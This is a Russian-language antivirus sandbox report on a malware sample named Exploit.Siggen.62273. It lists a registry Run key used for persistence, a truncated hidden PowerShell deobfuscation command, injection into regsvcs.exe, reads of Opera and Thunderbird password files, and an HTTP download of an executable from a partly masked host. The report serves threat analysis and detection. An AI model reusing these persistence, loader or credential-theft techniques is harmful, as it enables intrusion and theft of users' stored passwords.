Exploit.Siggen.62273

Техническая информация

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'NewApp' = '%APPDATA%\NewApp\NewApp.exe'

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function qa7a7 {param($weff1)$mb5b1='nddc428';$wd45b4='';for ($i=0; $i -lt $weff1.length;$i+=2){$le17f85=[convert]::ToByte($weff1.Substring($i,2),16);$wd45b4+=[char]($le17...

Внедряет код в

следующие системные процессы:

%WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe

Читает файлы, отвечающие за хранение паролей сторонними программами

%APPDATA%\opera software\opera stable\login data
%APPDATA%\thunderbird\profiles.ini

Изменения в файловой системе

Создает следующие файлы

%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{2e68423f-3f03-4027-aaf6-19ada370c8fd}.tmp
%TEMP%\resebab.tmp
%TEMP%\resf0eb.tmp
%TEMP%\resf659.tmp
%TEMP%\res27f.tmp
%TEMP%\3_fr6c-z.dll
%TEMP%\5zrzo7h3.dll
%TEMP%\tjvr17-1.dll
%TEMP%\ggislg05.dll
%TEMP%\cscee1.tmp
%TEMP%\res1be3.tmp
%TEMP%\qjnchs5x.dll
%APPDATA%\y157373.exe
%APPDATA%\newapp\newapp.exe
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
%TEMP%\csc26e.tmp
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
%TEMP%\cscf639.tmp
%TEMP%\csceb8b.tmp
%TEMP%\5zrzo7h3.0.cs
%TEMP%\5zrzo7h3.cmdline
%TEMP%\5zrzo7h3.out
%TEMP%\3_fr6c-z.0.cs
%TEMP%\3_fr6c-z.cmdline
%TEMP%\3_fr6c-z.out
%TEMP%\tjvr17-1.0.cs
%TEMP%\tjvr17-1.cmdline
%TEMP%\tjvr17-1.out
%TEMP%\qjnchs5x.0.cs
%TEMP%\qjnchs5x.cmdline
%TEMP%\qjnchs5x.out
%TEMP%\ggislg05.0.cs
%TEMP%\ggislg05.cmdline
%TEMP%\ggislg05.out
%TEMP%\cscf0da.tmp
%LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol

Присваивает атрибут 'скрытый' для следующих файлов

%APPDATA%\newapp\newapp.exe

Удаляет следующие файлы

%TEMP%\resebab.tmp
%TEMP%\ggislg05.0.cs
%TEMP%\tjvr17-1.cmdline
%TEMP%\tjvr17-1.pdb
%TEMP%\tjvr17-1.0.cs
%TEMP%\tjvr17-1.dll
%TEMP%\tjvr17-1.out
%TEMP%\3_fr6c-z.0.cs
%TEMP%\qjnchs5x.0.cs
%TEMP%\3_fr6c-z.out
%TEMP%\3_fr6c-z.cmdline
%TEMP%\3_fr6c-z.dll
%TEMP%\qjnchs5x.pdb
%TEMP%\qjnchs5x.cmdline
%TEMP%\qjnchs5x.dll
%TEMP%\ggislg05.cmdline
%TEMP%\3_fr6c-z.pdb
%TEMP%\ggislg05.out
%TEMP%\cscf639.tmp
%TEMP%\resf0eb.tmp
%TEMP%\resf659.tmp
%TEMP%\res27f.tmp
%TEMP%\cscf0da.tmp
%TEMP%\csceb8b.tmp
%TEMP%\csc26e.tmp
%TEMP%\res1be3.tmp
%TEMP%\ggislg05.pdb
%TEMP%\cscee1.tmp
%TEMP%\5zrzo7h3.dll
%TEMP%\5zrzo7h3.0.cs
%TEMP%\5zrzo7h3.out
%TEMP%\5zrzo7h3.cmdline
%TEMP%\5zrzo7h3.pdb
%TEMP%\ggislg05.dll
%TEMP%\qjnchs5x.out

Сетевая активность

TCP

Запросы HTTP GET

http://bu##la.rs/doc05655820200311164546.exe

UDP

DNS ASK bu##la.rs

Другое

Создает и запускает на исполнение

'%APPDATA%\y157373.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function qa7a7 {param($weff1)$mb5b1='nddc428';$wd45b4='';for ($i=0; $i -lt $weff1.length;$i+=2){$le17f85=[convert]::ToByte($weff1.Substring($i,2),16);$wd45b4+=[char]($le17...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5zrzo7h3.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3_fr6c-z.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tjvr17-1.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qjnchs5x.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ggislg05.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEBAB.tmp" "%TEMP%\CSCEB8B.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF0EB.tmp" "%TEMP%\CSCF0DA.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF659.tmp" "%TEMP%\CSCF639.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES27F.tmp" "%TEMP%\CSC26E.tmp"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1BE3.tmp" "%TEMP%\CSCEE1.tmp"' (со скрытым окном)

Запускает на исполнение

'%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
'%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5zrzo7h3.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3_fr6c-z.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tjvr17-1.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qjnchs5x.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ggislg05.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEBAB.tmp" "%TEMP%\CSCEB8B.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF0EB.tmp" "%TEMP%\CSCF0DA.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF659.tmp" "%TEMP%\CSCF639.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES27F.tmp" "%TEMP%\CSC26E.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1BE3.tmp" "%TEMP%\CSCEE1.tmp"
'%WINDIR%\microsoft.net\framework\v2.0.50727\regsvcs.exe'